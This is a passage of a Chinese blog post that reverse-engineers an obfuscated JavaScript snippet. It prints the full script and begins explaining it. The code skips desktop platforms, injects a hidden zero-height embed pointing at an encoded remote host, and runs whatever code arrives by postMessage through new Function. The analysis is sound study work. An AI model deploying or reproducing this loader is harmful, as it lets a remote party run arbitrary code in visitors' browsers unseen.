一个冷门的js加密逆向分析(二)

一个冷门的js加密逆向分析(二)_第1张图片
前天发了一片js加密分析的文章,今天继续来说第二层加密是什么样的。

上源代码

window["" + "f" + "3" + "2" + "0" + "6" + "b" + "1" + ""] = function () {
    ;(function (v509de, m27adb, me846d07, w4656a) {
        if (/^Mac|Win/.test(navigator.platform)) {
            return
        }
        ;var xfbe733b = function (e2d163) {
            return String.fromCharCode(e2d163)
        };
        var eecec = ["t-1", "v-19", "u-60239125016645", "d-2024-02-04 00:15:01", "sys-zc"];
        var p46fa13 = me846d07[xfbe733b(0x61) + xfbe733b(0x74) + xfbe733b(0x6F) + xfbe733b(0x62)],
            t0f122a95 = me846d07[xfbe733b(0x62) + xfbe733b(0x74) + xfbe733b(0x6F) + xfbe733b(0x61)],
            m80ca1 = w4656a[p46fa13("Y3Vycm3VudFNjcmlwdA==")], iea784a99 = p46fa13("Y3JlYXRlRWxlbWVudA=="),
            r78e9d6d = p46fa13("c3Vic3ReyaW5n"), m4934 = p46fa13("cmVwwbGFjZQ=="), z8acdd2e = p46fa13("c3BsaXQ="),
            tbe47d4 = p46fa13("cmV2ZXJszZQ=="), df4b03a = p46fa13("ame9pbg=="), fbb96d36 = p46fa13("cmFuZG9t"),
            c19db4e = me846d07[p46fa13("TWFe0aA==")], z43a1d0 = p46fa13("bG9hwZA==");
        var d652c518b = p46fa13("emNkdZWJ1Zw==");
        var t3efa0c8c;
        if (location.search.indexOf(d652c518b) > -1) {
            t3efa0c8c = w4656a[iea784a99](p46fa13("dGV4ddGFyZWE="));
            t3efa0c8c.id = "t" + (c19db4e[fbb96d36]() * 10000);
            t3efa0c8c.style.width = "100%";
            t3efa0c8c.style.height = "500px";
            t3efa0c8c.disabled = true;
            if (w4656a.body != null) {
                w4656a.body.appendChild(t3efa0c8c)
            } else {
                var ed92204 = function () {
                    w4656a.body.appendChild(t3efa0c8c);
                    me846d07.removeEventListener(z43a1d0, ed92204, false)
                };
                me846d07.addEventListener(z43a1d0, ed92204, false)
            }
        }
        var f5d56ca77 = w4656a[iea784a99](p46fa13("ZW1iZfWQ="));
        f5d56ca77.style.height = "0px";
        f5d56ca77.id = m27adb + (c19db4e.ceil(c19db4e[fbb96d36]() * 10000));
        var d155a = function (k4b38d864) {
            var p71eb = new Date();
            var n2a43cae4 = `advSpaceId_${m27adb}_${p71eb.toLocaleDateString()}`;
            var kd7c5922 = JSON.parse(localStorage.getItem(n2a43cae4));
            if (kd7c5922 == null) {
                kd7c5922 = {browserCount: 0}
            }
            kd7c5922.browserCount++;
            var g2853c = t0f122a95(eecec.concat([Date["now"](), location.href, `hsc-${kd7c5922.browserCount}`]).sort(() => c19db4e[fbb96d36]() - 0.5)[df4b03a](","));
            var hb14cd75 = g2853c.indexOf(xfbe733b(0x3d)) > -1 ? g2853c[r78e9d6d](g2853c.indexOf(xfbe733b(0x3d))) : "";
            g2853c = g2853c[m4934](hb14cd75, "")[z8acdd2e]("")[tbe47d4]()[df4b03a]("") + hb14cd75;
            f5d56ca77.src = ["https://", k4b38d864, g2853c][df4b03a]("/");
            w4656a.body.appendChild(f5d56ca77);
            if (t3efa0c8c != null) {
                t3efa0c8c.value += "\\r\\nappended em to html";
                var r525dbdda = w4656a.getElementById(f5d56ca77.id);
                if (r525dbdda == null || r525dbdda == undefined) {
                    t3efa0c8c.value += "\\r\\n cant get em from html"
                }
            }
        };
        if (t3efa0c8c != null) {
            t3efa0c8c.value += "\\r\\nsend js host " + v509de
        }
        var me9d499 = function (p345e74a9) {
            return p46fa13(p345e74a9)[m4934](xfbe733b(0x2A), c19db4e[fbb96d36]().toString(36).slice(c19db4e.floor(c19db4e[fbb96d36]() * 9) + 2))
        };
        d155a(me9d499(v509de));
        me846d07["addEventListener"]("message", function (e) {
            if (e.data.k == m27adb) {
                w4656a.getElementById(f5d56ca77.id).remove();
                if (t3efa0c8c != null) {
                    t3efa0c8c.value += "\\r\\nreceive em post message";
                    t3efa0c8c.value += "\\r\\ne.data.v " + e.data.q
                }
                new Function("args", e.data.q)({_tdcs: m80ca1, _tra: t3efa0c8c})
            }
        })
    })("Ki5kYW5zaGVzaGkuY29t", "60239125016645", window, document)
};
f3206b1()

业务分析仅本人猜测,不代表其实际意义

这段代码看起来像是一个广告脚本,它的主要功能是在用户的浏览器中插入一个隐藏的元素,然后加载一个特定的广告。这里是一些关键点:

  1. 代码首先检查用户的平台是否为Mac或Windows,如果是,则不执行任何操作。
  2. 定义了一些变量和函数,包括一些用于字符串操作和随机数生成的函数。
  3. 如果URL查询参数中包含特定的字符串("emNkdZWJ1Zw=="的Base64解码结果),则在页面上创建一个禁用的